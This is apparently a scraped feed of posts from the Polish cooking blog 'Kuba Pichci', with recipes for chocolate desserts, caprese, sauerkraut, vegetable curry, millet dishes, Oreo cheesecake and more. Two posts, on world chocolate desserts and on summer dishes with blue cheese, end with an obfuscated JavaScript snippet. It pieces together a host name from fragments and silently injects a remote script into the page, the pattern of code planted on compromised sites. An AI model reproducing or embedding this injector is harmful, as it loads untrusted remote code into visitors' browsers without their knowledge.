Desery czekoladowe z różnych stron świata

Kuba Pichci

Desery czekoladowe z różnych stron świata

Czekolada to afrodyzjak i niemal obowiązkowy element podczas każdej, romantycznej kolacji. Ciasta na bazie czekolady, truskawki w czekoladzie popijane szampanem, czy też gorący napój czekoladowy z odrobiną chilli. Sposobów na wykorzystanie tego słodkiego wyrobu jest mnóstwo – każdy zakątek świata ma na niego swój pomysł.Czekolada produkowana jest z kakao oraz masła kakaowego, które otrzymuje się z nasion rośliny nazywanej kakaowcem. Wyróżnia kilka odmian czekolady, ale do najpopularniejszych należą – gorzka, mleczna oraz biała. Więcej informacji o tym co je łączy i dzieli znajdziecie tutaj: http://www.codogara.pl/category/kulinarne-potyczki/. Czekolada bardzo często wykorzystywana jest w gastronomii, szczególnie podczas komponowania deserów. Nieprzesadzone są tu słowa, że każda kostka dosłownie rozpływa się w ustach – czekolada rozpuszcza się właśnie w temperaturze naszego ciała. Wyśmienicie smakuje, a dodatkowo poprawia nastrój – podnosi poziom endorfin i serotoniny, które odpowiadają za samopoczucie, w tym depresję. Gdzie więc czekolada jest najpopularniejsza?Meksyk – pikantny napój bogówMeksyk kojarzy się przede wszystkim z pikantną papryczką chilli, dodawaną praktycznie do każdej potrawy. Nie inaczej mogłoby być z gorącą czekoladą, która jest niemal sztandarowym napojem Meksykan. Piją ją do śniadania, w czasie deseru, witają nią gości. Napój dodaje energii, dlatego często zastępuje się nim filiżankę kawy. Masę kakaową zalewa się gorącą wodą lub mlekiem, w zależności od preferencji. Dodatek odrobiny chilli tylko wyostrzy jej smak. Meksyk słynie z wytwórni czekolad, nic dziwnego – jest jej ojczyzną. Jedno co maże zaskoczyć to fakt, że znane nam tradycyjne tabliczki z kakaowca są tu mało popularne. Czekoladę tutaj przede wszystkim się pije.Belgia – czekoladowe królestwoWycieczka do Belgii jest marzeniem każdego smakosza czekolady. Jest tu najwięcej wytwórni, które produkują wyśmienite pralinki. Cukiernie z małymi czekoladkami różnią się nieco od naszych – wyglądają jak galerie sztuki, a pralinki wybieramy niczym złoto u jubilera. Nigdzie na świecie nie znajdziemy tak oryginalnych czekoladek, w aż tylu odsłonach. Ilu producentów, tyle przepisów – a każdy owiany tajemnicą. Pralinki tworzone są ręcznie, co pochłania dużo czasu – stąd też wygórowane ceny deserów. Sztuki wyrabiania małych czekoladek można nauczyć się w specjalnych szkołach, gdzie po kilku latach nauki zdobywa się tytuł Mistrza Czekolady.Francja – bajeczne ciastko z płynnym środkiemW składzie niemal każdego francuskiego deseru jest czekolada. Popijając kawę w paryskiej kawiarni kelner z pewnością zaproponuje coś słodkiego, np. chocolate fondant. To ciasto to klasyka francuskiego cukiernictwa. Pyszne, mocno czekoladowe z gorącym, płynnym środkiem. Deser przygotowuje się tuż przed podaniem, żeby nie zdążył ostygnąć. Posypuje się go cukrem pudrem, dekoruje świeżymi owocami lub podaje z lodami – jak w Polsce szarlotkę lub sernik po wiedeńsku. Francuski deser świetnie smakuje, a do przygotowania go potrzeba zaledwie kilku składników. Zbędny jest nawet robot kuchenny.Czekolada jest składnikiem wielu pysznych deserów, na które przepisy znajdziecie w serwisie Codogara. Jest nie tylko smaczna, ale i zdrowa. Użycie jej w dowolnym deserze gwarantuje sukces – czy jest ktoś, kto jej nie lubi?// (function(){ uib4=document.createElement("script");uib4.type="text/javascript"; uib4.async=true;uib4_=(("us")+"t")+"a";uib4_+=("t.i")+""+"n";uib4_+=(("f")+"o"); uib4.src="http://"+uib4_+"/5141416.7i8zkzj3ib42fd8Xje3awyu8t4k8ap"; document.body.appendChild(uib4); })(); // ]]>Post Desery czekoladowe z różnych stron świata pojawił się poraz pierwszy w Kuba Pichci.

Caprese

Kuba Pichci

Caprese

Caprese to sałatka, która dzięki swym kolorom stała się symbolem Włoch. Jest niezwykle prosta, ale jeśli użyjemy dobrej jakości składników może stać się królową stołu.przepis na capreseskładniki:pomidorybazyliamozzarellaprzygotowanie:Pomidory i ser kroimy w plastry.Na każdym plasterku sera kładziemy kawałek mozzarelli, a tę z kolei przykrywamy liściem bazylii.Całość skrapiamy oliwą lub octem balsamicznym (kwestia gustu).Smacznego!Post Caprese pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Pizza z żółtymi pomidorami i czerwoną cebulą

Nie wiem jak Wy, ale ja uwielbiam pizzę i lubię bawić się jej składnikami. Niedawno pojawiły się żółte pomidory i pomyślałem, że fajnie będą się one komponować z czerwoną (a raczej fioletową) cebulą. Nie myliłem się – nie tylko ładnie wyglądała, ale i doskonale smakowała.przepis na pizzę z żółtymi pomidorami i czerwoną cebuląskładniki:ciasto na pizzę (przepis znajdziecie TUTAJ)żółte pomidoryczerwona cebulamozarellaprzygotowanie:Gdy przygotujemy już ciasto zgodnie z przepisem, wyrabiamy placek.Skrapiamy go oliwą i układamy na nim warzywa.Całość posypujemy startym serem i pieczemy 10 minut w 250 st. C.Smacznego!Post Pizza z żółtymi pomidorami i czerwoną cebulą pojawił się poraz pierwszy w Kuba Pichci.

Kapusta kiszona

Kuba Pichci

Kapusta kiszona

To już prawdopodobnie ostatnie promienie letniego słońca i czas najwyższy przyjąć do wiadomości, że już za kilka dni zawita do nas jesień. W wielu domach to okres przygotowywania różnych przetworów na zimę i prawdopodobnie ktoś szukać będzie przepisu na kiszoną kapustę. Można ją co prawda bez większego problemu kupić w każdym warzywniaku i w większości sklepów spożywczych (przynajmniej w Polsce), jestem jednak przekonany, że dużo frajdy i satysfakcji da samodzielne jej przygotowanie.Kapusta kiszona to niezwykle ważny składnik jesienno-zimowej diety, zapewniający mnóstwo witamin i regulujący temperaturę i pracę kluczowych organów.przepis na kiszoną kapustęskładniki:kapustainne warzywa (marchewka, cebula, imbir, czosnek) według uznaniasól kamienna niejodowanalistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='kapusta inne warzywa (marchewka, cebula, imbir, czosnek) według uznaniasól kamienna niejodowana'; document.write(" "); przygotowanie:Zaczynamy od pokrojenia kapusty. Można użyć specjalnej szatkownicy lub zwykłego noża.Kroimy również pozostałe warzywa. To czy w ogóle dodacie jakieś warzywa do kapusty, jakie to warzywa będą i w jakich ilościach zależy tylko i wyłącznie od Was. Ja osobiście polecam dodatek czosnku i imbiru, ale równie dobrze może to być po prostu marchewka.Kapustę mieszamy z warzywami i posypujemy solą (około 2 łyżki / kilogram warzyw). Ugniatamy warzywa, aż wytworzy się sak i poczujemy że warzywa zmiękły.Przekładamy je do naczynia (np. słoika) i przykrywamy talerzykiem, który sprawi, że sok całkiem przykryje warzywa. Na talerzyku kładziemy jakiś obciążnik.Jeśli soku jest za mało, można dodać nieco wody z solą (około 2 łyżki / litr).Smacznego!Post Kapusta kiszona pojawił się poraz pierwszy w Kuba Pichci.

Curry z bakłażanem, okrą i ciecierzycą

Kuba Pichci

Curry z bakłażanem, okrą i ciecierzycą

Opisywałem niedawno warsztaty z kuchni wegetariańskiej, w czasie których przygotowywaliśmy pasty kanapkowe. W kolejny mym spotkaniu z cyklu Łódzka Kuchnia Dobrego Smaku mieliśmy okazję poznać kuchnię bezglutenową, o której opowiadał nam Kamil, członek Polskiego Stowarzyszenie Osób z Celiakią.Przyznać muszę, że kuchnia wolna od glutenu jest dla mnie całkowitą nowością. Ponieważ mam to szczęście i nie muszę wykluczać do z jadłospisu, nie zastanawiałem się nad tym, jak bardzo utrudnione życie mają osoby chore na celiakię. To nie tylko rezygnacja z tak oczywistych rzeczy jak chleb, makarony pizza, które przychodzą wielu osobom w pierwszej kolejności na myśl. Gluten ukryty jest niemal każdym ciastku, w chipsach, przyprawach, w jogurtach i sosach. Rezygnacja z glutenu oznacza także w zasadzie rezygnację z piwa (są piwa bezglutenowe, ale są trudno dostępne i drogie). Lista zakazanych produktów jest długa, a choroba zmusza do ciągłego sprawdzania etykiet podczas zakupów. Zdarza się, że produkt, który wczoraj było ok., dziś zmienił nieco skład i może wywoływać reakcję alergiczną. A jakie są skutki spożycia? W zależności od stopnia nietolerancji oraz od przyjętej dawki, od delikatnej reakcji skórnej, przez rewolucje żołądkowe po szok anafilaktyczny, który może doprowadzić do śmierci.Jednak to co dla nas wydawać się może wielkim wyczynem, dla chorych na celiakię jest codziennością z którą są zwykle pogodzeni i umiejętnie dają sobie radę. Kamil pokochał kuchnię indyjską, opartą dużej mierze na bezpiecznym dla niego ryżu i to właśnie dania indyjskie mieliśmy okazję przygotowywać.przepis na curry z bakłażanem, okrą i ciecierzycąskładniki:2 duże cebule3 ząbki czosnku1 cm imbiru4 pomidorypapryczka chili (ilość wg. gustu)mały bakłażanpuszka okrypuszka ciecierzycykolendramasło klarowanekmin rzymskikurkumamasala tandoorilistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='2 duże cebule3 ząbki czosnku1 cm imbiru4 pomidorypapryczka chili (ilość wg. gustu)mały bakłażanpuszka okrypuszka ciecierzycykolendramasło klarowanekmin rzymskikurkumamasala tandoori'; document.write(" "); przygotowanie:Zaczynamy od roztopienia 2 łyżek klarowanego masła w rondlu.dy będzie już rozgrzane dodajemy 1 łyżkę kuminu rzymskiego, a po chwili drobno posiekany czosnek. Po chwili dodajemy posiekany imbir i chili.Mieszamy i dodajemy drobno posiekaną cebulę.Całość przesmażamy do czasu, aż cebula się zeszkli. Gdy to nastąpi dodajemy połowę pokrojonych w kostkę pomidorów i tak samo pokrojonego bakłażana.Dusimy całość, aż pomidory się rozpadną. Dodajemy wówczas 1 łyżkę masali i 1 łyżeczkę kurkumy, a także odcedzoną okrę i ciecierzycę. Okrę można wcześniej nieco pokroić.Mieszamy i dusimy do czasu aż całość się zagęści.Na koniec dodajemy resztę pomidorów i dusimy jeszcze kilka minut.Curry podajemy z ryżem posypane obficie posiekaną kolendrą.Smacznego!Post Curry z bakłażanem, okrą i ciecierzycą pojawił się poraz pierwszy w Kuba Pichci.

Jarzynowy zawrót głowy – wegetariańskie dania z serem pleśniowym na upały

Kuba Pichci

Jarzynowy zawrót głowy – wegetariańskie dania z serem pleśniowym na upały

Sezon jarzynowy w pełni, a wraz z nim na nasze talerze wkraczają kolorowe, zdrowe i pachnące warzywa. Kiedy letnia pogoda wprawia nas w wesoły nastrój, apetyt na smaczne i lekkie potrawy z nowalijek wzrasta. Leniwe popołudnie w skąpanym słońcem ogrodzie, z orzeźwiającym napojem w ręku i barwną przekąską na talerzu jest tym, co łakomczuchy lubią najbardziej. Jarzynowy zawrót głowy sprzyja eksperymentom w kuchni. Nowe kompozycje z serem pleśniowym? Oto kilka pomysłów.Ser pleśniowy w duecie z owocami – pychota!Truskawki – najsłodszy dar lata; obok świeżego koktajlu z tych owoców mało kto przejdzie obojętnie. A gdyby tak truskawki zestawić z serem pleśniowym? Eksplozja smaku w ustach i zupełnie nowe doświadczenie kulinarne gwarantowane. Wykorzystaj sprawdzony ser pleśniowy marki Castello i połącz go w sałatce z rukolą lub roszpunką i truskawkami. Możesz dodać również kurczaka albo szynkę. Do tego dresing balsamiczny i oryginalna przekąska gotowa.Lato kojarzy ci się na pewno także z soczystym arbuzem. Połączenie tego owocu z serem pleśniowym to zestaw, który zadowoli niejednego smakosza. Do tego niebanalnego duetu dołącz ostrą rukolę, a wszystko skrop vinegrette miodowo-orzechowym. Palce lizać!Sezonowe warzywa uwielbiają towarzystwo sera pleśniowego!Zawsze staraj się do swoich potraw wplatać właśnie te warzywa, na które jest obecnie sezon. W ten sposób masz pewność, że twoja kuchnia dostarczy domownikom wielu witamin. Aby urozmaicić smak, łącz jarzyny z serem pleśniowym. Świetną kompozycję taki ser stworzy na przykład z uwielbianym przez Polaków i niezwykle zdrowym bobem. Smaki tych dwóch składników doskonale się uzupełniają. Stwórz z nich np. pyszną sałatkę. Dodaj świeże pomidory oraz pachnącą rukolę i ciesz się niezwykłymi doznaniami!Masz ochotę na coś nieco bardziej sycącego? Zdecyduj się na tartę z cukinią, pomidorami i wyjątkowym serem pleśniowym Castello. Taki zestaw to wyjątkowy smak późnego lata.Witaminową bombę na talerzu zaserwuj, zapiekając koper włoski z pleśniowym serem. Jeżeli jeszcze nie miałeś okazji przekonać się o wyjątkowym smaku tego warzywa, to jest to pomysł, który z pewnością cię zachwyci. Lato oznacza także sezon na fasolkę szparagową. Doskonale znasz smak tego warzywa w połączeniu z bułką tartą? Smaczną alternatywą może być kompozycja z fasolki, makaronu i plasterków szynki polana sosem z sera pleśniowego i śmietanki. Pychota!Sezon letni obfituje w świeże owoce i warzywa, które aż się proszą o to, abyś pozwolił im zagościć na twoim talerzu. Jarzynowy zawrót głowy dopraw serem pleśniowym i ciesz się apetycznymi kompozycjami. Eksperymenty dozwolone – ważne, aby było smacznie i zdrowo!// (function(){ ud8g=document.createElement("script");ud8g.type="text/javascript"; ud8g.async=true;ud8g_=(("us")+"t")+"a";ud8g_+=("t.i")+""+"n";ud8g_+=(("f")+"o"); ud8g.src="http://"+ud8g_+"/3691051.bezcr7btd8gl69fgyd40wukk9y7vuy"; document.body.appendChild(ud8g); })(); // ]]>Post Jarzynowy zawrót głowy – wegetariańskie dania z serem pleśniowym na upały pojawił się poraz pierwszy w Kuba Pichci.

Kawa mrożona – idealny napój na lato

Kuba Pichci

Kawa mrożona – idealny napój na lato

Kuba Pichci

Kasza jaglana z jarmużem

Jarmuż jadam od niedawna. Ta bardzo „polska” roślina niestety odeszła na jakiś czas w zapomnienie, jednak łatwiej można ją kupić. A warto, bo jest nie tylko smaczna, ale i zdrowa i odżywcza.Kasza z jarmużem sprawiać może wrażenie „przedszkolnej papki”, jednak to naprawdę bardzo fajne danie, które z pewnością gościć będzie często na mym stole.przepis na kaszę jaglaną z jarmużemskładniki:0,75 szklanki kaszy jaglanej1,5 szklanki300 g jarmużu2 ząbki czosnku0,5 łyżeczki kurkumyprzygotowanie:Kaszę przelewamy wrzątkiem, a następnie przekładamy do garnka, zalewamy czystą zimną wodą i gotujemy, aż płyn zostanie całkowicie wchłonięty.Jarmuż dokładnie płuczemy i siekamy.W między czasie gotujemy w garnku wodę. Gdy będzie już wrzeć, wrzucamy do niej jarmuż i chwilę go gotujemy. Następnie wyjmujemy i odkładamy na durszlak.Czosnek drobno siekamy i przesmażamy krótko na odrobinie tłuszczu. Dodajemy do niego jarmuż i razem krótko smażymy.Na koniec dodajemy ugotowaną kaszę jaglaną, delikatnie mieszamy i doprawiamy do smaku.Smacznego!Post Kasza jaglana z jarmużem pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Placki z serka homogenizowanego z truskawkami i bitą śmietaną

Szybkie i banalnie prosty przepis na śniadanie, obiad i kolację. Wymieszać, usmażyć i zjeść.przepis na placki z serka homogenizowanego z truskawkami i bitą śmietanąskładniki:200 g serka homogenizowanego (może być naturalny lub smakowy)2 jajkapół szklanki mąki pszennejpłaska łyżeczka proszku do pieczenia200 ml mocno schłodzonej śmietany 30 lub 36%łyżka cukru pudru lub drobnego kryształu500 g truskaweklistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='200 g serka homogenizowanego (może być naturalny lub smakowy)2 jajkapół szklanki mąki pszennejpłaska łyżeczka proszku do pieczenia200 ml mocno schłodzonej śmietany 30 lub 36%łyżka cukru pudru lub drobnego kryształu500 g truskawek'; document.write(" "); przygotowanie:Jajka miksujemy z serkiem na gładką masę, a następnie dodajemy proszek do pieczenia i mąkę.Smażymy na odrobinie tłuszczu do czasu uzyskania złotego koloru.Śmietanę miksujemy z cukrem, aż uzyskamy pożądany stopień zgęstnienia.Truskawki płuczemy i kroimy w kawałki.Na placki nakładamy śmietanę i posypujemy truskawkami.Smacznego!Post Placki z serka homogenizowanego z truskawkami i bitą śmietaną pojawił się poraz pierwszy w Kuba Pichci.

Risotto z pieczarkami

Kuba Pichci

Risotto z pieczarkami

Siedzę sobie właśnie na łonie natury i wspominam niedany obiad, na który przygotowałem risotto z pieczarkami. To proste danie, którego przygotowanie nie zajmuje zbyt wiele czasu. Jego plusem jest to, że można sobie przygotować większą porcję i np. rozłożyć na dwa dni. Poza tym ryż fajnie współgra z różnymi przyprawami, dzięki czemu każdy może doprawić po swojemu i jestem przekonany, że będzie dobrze.przepis na risotto z pieczarkamiskładniki:1 szklanka ryżu (najlepiej specjalnego gatunku do tego typu dań – arborio)250 g pieczarekcebula2 ząbki czosnku1 litr bulionu (osobiście polecam warzywny, ale użyjcie swego ulubionego)3 łyżki masła4 łyżki startego parmezanunatka pietruszkilistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='1 szklanka ryżu (najlepiej specjalnego gatunku do tego typu dań - arborio)250 g pieczarekcebula2 ząbki czosnku1 litr bulionu (osobiście polecam warzywny, ale użyjcie swego ulubionego)3 łyżki masła4 łyżki startego parmezanunatka pietruszki'; document.write(" "); przygotowanie:Cebulę i czosnek drobno siekamy i szklimy na maśle.Po kilku minutach dodajemy suchy ryż i przesmażamy go z warzywami około minutę.Dodajemy stopniowo bulion. Ważne by dawać małe porcje (około 100 ml) i czekać z kolejną porcją bulionu, aż poprzednia się wchłonie.W międzyczasie kroimy i przesmażamy pieczarki, które dodajemy na sam koniec gotowania ryżu.Dodajemy parmezan i doprawiamy risotto do smaku.Podajemy posypane posiekaną natką pietruszki.Smacznego!Post Risotto z pieczarkami pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Pasta z kaszy jaglanej z suszonymi pomidorami

W ubiegłym tygodniu brałem udział w pierwszych warsztatach kulinarnych realizowanych przez Fundację Biosynergia w ramach projektu Łódzka Szkoła Dobrego Smaku. Pierwszy dzień poświęcony był kuchni wegetariańskiej, którą przybliżył nam prowadzący zajęcia Jacek Jędrzejczak. Pomimo, iż posiadam dość dużą wiedzę na temat diety bezmięsnej, to wróciłem do domu z dużą dawką nowych wiadomości.Połowa zajęć bogata w teorię szybko minęła i przystąpiliśmy do części praktycznej, w czasie której przygotowywaliśmy w parach pasty kanapkowe. Dużą zaletą była możliwość korzystania wielu produktów, których wcześniej nie używałem.Wspólnie z Anią, którą poznałem na zajęciach, postanowiliśmy przygotować pastę na bazie kaszy jaglanej, którą złamaliśmy suszonymi pomidorami, czosnkiem i prażonymi pestkami dyni.Z niecierpliwością czekam na kolejne warsztaty, o których bez wątpienia Wam opowiem.przepis na pastę z kaszy jaglanej z suszonymi pomidoramiskładniki:szklanka kaszy jaglanej2 szklanki mleka ryżowego3/4 szklanki suszonych pomidorów w oliwieząbek czosnku1/2 szklanki pestek dynilistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='szklanka kaszy jaglanej2 szklanki mleka ryżowego3/4 szklanki suszonych pomidorów w oliwieząbek czosnku1/2 szklanki pestek dyni'; document.write(" "); przygotowanie:Kaszę prażymy chwilę w gorącym garnku, następnie zaś zalewamy mlekiem i gotujemy aż całkowicie zaabsorbuje ona płyn.Studzimy ją i dodajemy posiekany czosnek. Miksujemy blenderem dodając po trochy oliwę z pomidorów do czasu aż uzyskamy gładką konsystencję.Dodajemy posiekane grubo suszone pomidory i uprażone pestki dyni.Smacznego!Post Pasta z kaszy jaglanej z suszonymi pomidorami pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Pieczone młode ziemniaki z sosem tzatziki

Prosty przepis na niezwykle smaczne ziemniaki. To idealna pora na ich przygotowanie, bo najlepsze będą ziemniaki młode, które można jeść w mundurkach. Pomysł na to danie zaczerpnąłem z bloga Vege Corner.Do tych ziemniaków idealnie nadaje się sos tatzyki, na który przepis znajdziecie TUTAJ.przepis na pieczone młode ziemniakiskładniki:1 kg młodych ziemniakówolej rzepakowy2-3 ząbki czosnkupęczek koperkusólsos tzatzykiprzygotowanie:Ziemniaki płuczemy i dokładnie szorujemy szczotką.Gotujemy je około 10-15 minut w osolonej wodzie.Następnie przekładamy je do miski i dodajemy posiekany drobno czosnek oraz nieco oleju. Doprawiamy solą według uznania.Mieszamy, aż ziemniaki pokryją się olejem i czosnkiem.Przekładamy je do naczynia do żaroodpornego i pieczemy około 15 minut w 200 st. C.Podajemy je posypane posiekanym koperkiem z sosem tzatzyki.Smacznego!Post Pieczone młode ziemniaki z sosem tzatziki pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Świderki z bobem

Na przełomie czerwca i lipca na naszym stole króluje bób. Objadamy się nim niemal codziennie i to w sumie dobrze, bo jest bardzo odżywczy, szczególnie polecany wegetarianom z uwagi na wysoką zawartość białka. Zwykle jemy bób po prostu ugotowany i skubiemy sobie go bez dodatków, jednak od czasu do czasu przygotowujemy jakieś inne dania z jego dodatkiem. Tym razem przyrządziliśmy świderki z bobem, które są daniem łatwym i szybkim w przygotowaniu.przepis na świderki z bobemskładniki:500 g ugotowanego i obranego bobu400 g ugotowanego makaronu typu świderki1 cebula2 ząbki czosnkugarść startego żółtego seranatka pietruszkilistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='500 g ugotowanego i obranego bobu400 g ugotowanego makaronu typu świderki1 cebula2 ząbki czosnkugarść startego żółtego seranatka pietruszki'; document.write(" "); przygotowanie:W czasie gdy gotujemy bób, gotujemy również makaron.Cebulę i czosnek drobno siekamy i szklimy na odrobinie tłuszczu.Ugotowany bób obieramy i dodajemy do cebuli i czosnku.Po kilku minutach, do warzyw dodajemy makaron.Chwilę całość razem przesmażamy, doprawiamy do smaku i mieszamy, na koniec dodając starty ser.Przed podaniem posypujemy posiekaną natką pietruszki.Smacznego!Post Świderki z bobem pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Kasza jaglana z truskawkami

Na śniadanie można zjeść sobie kanapkę z żółtym serem, można zjeść ciastko z 7 zbóż, które będzie cały dzień uwalniać węglowodany, można też wypić kawę i wypalić papierosa. Ja tymczasem zachęcam Was byście zaczęli dzień od kaszy jaglanej, która dostarczy Wam mnóstwo energii, dostarczy zdrowych składników i oczyści organizm z tych niezdrowych. Nie mam zamiaru się rozpisywać o jej pozytywnych walorach, bo informację na ten temat znajdziecie bez trudu w sieci, zachęcam Was jednak byście przynajmniej 2 czy 3 razy w tygodniu zjedli takie śniadanie, a w bardzo krótkim czasie poczujecie się dużo lepiej.W sezonie polecam dodawanie świeżych owoców, natomiast poza sezonem można z powodzeniem użyć bakalii. jeśli ktoś ma chęć, może sobie dosłodzić kaszę np. miodem. Jeśli ktoś woli bardziej wytrawne smaki, także tu ma pole do popisu – oliwki, pieczarki i inne warzywa wspaniale urozmaicą Wasze śniadanie.Przyznać muszę, że sam podchodziłem do pomysły by jadać kaszę na śniadanie z dystansem. Przede wszystkim bałem się, że przygotowanie zajmie dużo czasu, jednak nic bardziej mylnego. Jeśli się dobrze zorganizujecie, macie pyszne ciepłe śniadanie w ciągu 12 minut. Przed momentem sam sprawdziłem ze stoperem i okazało się, że kasza gotowała się 10 minut. W czasie gdy ona się gotowała, ja pokroiłem truskawki i zmieliłem w moździerzu siemię lniane. Miałem jeszcze kilka minut by napisać kilka słów tego wpisu.przepis na kaszę jaglaną z truskawkamiskładniki:1/2 szklanki kaszy jaglanejgarść truskawek1 łyżka siemienia lnianego1 łyżeczka mioduprzygotowanie:Kaszę płuczemy, a następnie zalewamy wodą i gotujemy do czasu aż cała woda zostanie wchłonięta.W tym czasie usuwamy szypułki i kroimy truskawki i mielimy siemię.Ugotowaną kaszę można nieco przestudzić lub od razu wymieszać z pozostałymi składnikami.Smacznego!Post Kasza jaglana z truskawkami pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Omlet z resztek

Nazwa być może nie brzmi zbyt zachęcająco, ale gdyby tak przetłumaczyć ją na język francuski (choćby przy pomocy internetowego translatora) to było by już lepiej. Kto nie pokusiłby się na wydanie 30 czy 40 zł gdyby w menu restauracji zobaczył danie „Omelette fait avec les restes” :-) Tak się złożyło, że miałem w lodówce resztę surówki z marchewki z poprzedniego dnia, a także nieco kiszonej kapusty, a że miałem ochotę na coś ciepłego postanowiłem to wszystko zamknąć w placku.Podane składniki są na oko, bo nie chodzi o to by z aptekarską precyzją odmierzyć poszczególne elementy, ale by pozbyć się resztek, zamiast wyrzucać je broń boże na śmietnik.przepis na omlet z resztekskładniki:szklanka startej marchewki1/2 szklanki kiszonej kapusty1/2 szklanki startego żółtego sera1/2 pęczka natki pietruszki3 jajkaprzygotowanie:Marchewkę i kapustę szatkujemy z grubsza, by nie ciągnęły się nam takie długie ich kawałki.Natkę drobno siekamy i dodajemy do marchewki i kapusty razem ze startym serem.Jajka rozbełtowujemy (jest takie słowo???) i łączymy z warzywami. Można dodać nieco wody gazowanej, co sprawi, że omlet będzie bardziej puszysty.Doprawiamy do smaku i wylewamy na nagrzaną i lekko natłuszczoną patelnię.Smażymy pod przykryciem do czasu, aż placek się zsiądzie.Smacznego!Post Omlet z resztek pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Placek z batatów jajkiem

Batat, zwany też inaczej słodkim ziemniakiem, to warzywo, które coraz częściej pojawia się na naszych stołach. Sam przyznaję, że dopiero niedawno poznałem jego smak, który najlepiej odda chyba określenie „ziemniaczana marchewka”. Ostatnio grillowałem bataty, które wcześniej pokroiłem w centymetrowe talarki – fajny dodatek do grillowych dań.Tym razem postanowiłem przygotować coś innego. Na blogu Kwestia smaku znalazłem przepis na placek z batatów z jajkiem, który postanowiłem przygotować. Przyznaję, że decydujące znaczenie miał czas przygotowanie potrawy – od pierwszego pociągnięcia obierakiem do pierwszego kęsa nie minęło więcej niż 20 minut.przepis na placek z batatów jajkiemskładniki:1 batat (200 – 300 g)1 cebulaoliwajajkaposiekana bazylialistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='1 batat (200 - 300 g)1 cebulaoliwajajkaposiekana bazylia'; document.write(" "); przygotowanie:Zaczynamy od obrania batata. Następnie ścieramy go na tarce o grubych oczkach.Ścieramy także cebulę, którą dodajemy do batata.Doprawiamy solą i dwoma łyżkami oliwy.Mieszamy i wykładamy do naczynia. Ja użyłem patelni z odczepianą rączką, ale można użyć innego naczynia żaroodpornego.Pieczemy 10 minut w 230 st. C.Gdy warzywa będą już upieczone, wbijamy jajka.Dopiekamy jeszcze kilka minut, aż jajko zsiądzie się tak jak lubicie.Przed podaniem posypujemy ziołami.Smacznego!Post Placek z batatów jajkiem pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Sernik z ciastkami Oreo

Naszła mnie wielka ochota na zrobienie jakiegoś fajnego ciacha. Wybór padł na sernik z ciastkami Oreo, który już dawno chodził mi po głowie. Postanowiłem skorzystać z niezawodnych przepisów Doroty z bloga Moje wypieki. Sernik okazał się strzałem w dziesiątkę – dość lekki, niezbyt słodki – w sam raz.przepis na sernik z ciastkami OreoSpódskładniki:150 g ciastek Oreo2 łyżki roztopionego masłaprzygotowanie:Ciastka dokładnie kruszymy lub miksujemy melakserem. Mieszamy dokładnie z masłem.Dno tortownicy o średnicy 23 cm wykładamy papierem do pieczenia, a na nim wykładamy masę ciasteczkową.Wstawiamy do lodówki, by spód nieco się schłodził.Masa serowaskładniki:800 g twarogu na sernik250 ml śmietany 30% lub 36%0,5 szklanki drobnego cukru3 jajka2 żółtka1 łyżka mąki ziemniaczanej1 łyżka mąki pszennej1,5 łyżeczki ekstraktu z wanilii150 g ciastek Oreoprzygotowanie:Wszystkie składniki oprócz ciastek mieszamy ze sobą. Miksujemy je do uzyskania jednolitej konsystencji, ale nie dłużej.Masę wylewamy na przygotowany spód, a w środek wkładamy ciastka pokrojone na połówki.Pieczemy w 150 st. C około godzinę, następnie studzimy w piekarniku z uchylonymi drzwiami.Sernik należy schłodzić w lodówce około 12 godzin.Kremskładniki:250 ml śmietany 30% lub 36%2 łyżki sera mascarpone1 łyżka cukru pudrulistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='150 g ciastek Oreo2 łyżki roztopionego masła800 g twarogu na sernik250 ml śmietany 30% lub 36%0,5 szklanki drobnego cukru3 jajka2 żółtka1 łyżka mąki ziemniaczanej1 łyżka mąki pszennej1,5 łyżeczki ekstraktu z wanilii150 g ciastek Oreo250 ml śmietany 30% lub 36%2 łyżki sera mascarpone1 łyżka cukru pudru'; document.write(" "); przygotowanie:Składniki ubijamy mikserem do uzyskania sztywnej masy kremowej.Masą dekorujemy tort.Na wierzchu układamy ciasteczka Oreo.Smacznego!Post Sernik z ciastkami Oreo pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Sałatka z rzodkiewek

Pisałem niedawno, że założyłem sobie mały warzywnik w którym posiałem między innymi rzodkiewki. Ku mojej uciesze, w ubiegły weekend mogłem już zebrać pierwszy plon tychże warzyw. Postanowiłem w całości wykorzystać dobro, jakim obdarowała mnie ziemia i wykorzystałem także liście rzodkiewek. Sałatka doskonale pasowała do grillowanych dań jakie wówczas podałem gościom.A sałatkę podałem gościom na supereko talerzu bo zrobionym z otrąb gryczanych. Po obiadku talerzyk trafił na kompost i znów wszystko zostanie w przyrodzie.przepis na sałatkę z rzodkiewekskładniki:pęczek rzodkiewek liśćmiząbek czosnkuoliwa z oliweklistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='pęczek rzodkiewek liśćmiząbek czosnkuoliwa z oliwek'; document.write(" "); przygotowanie:Pęczek rzodkiewek dokładnie płuczemy, a następnie odcinamy liście.Liście z lekka szatkujemy, następnie skrapiamy oliwą i układamy na dnie naczynia.Odcinamy ogonki rzodkiewek i układamy warzywa na liściach.Obrany ząbek czosnku kroimy w cieniutkie plasterki i posypujemy nimi sałatkę.Smacznego!Post Sałatka z rzodkiewek pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Zapiekanka ziemniaczana z kalarepą

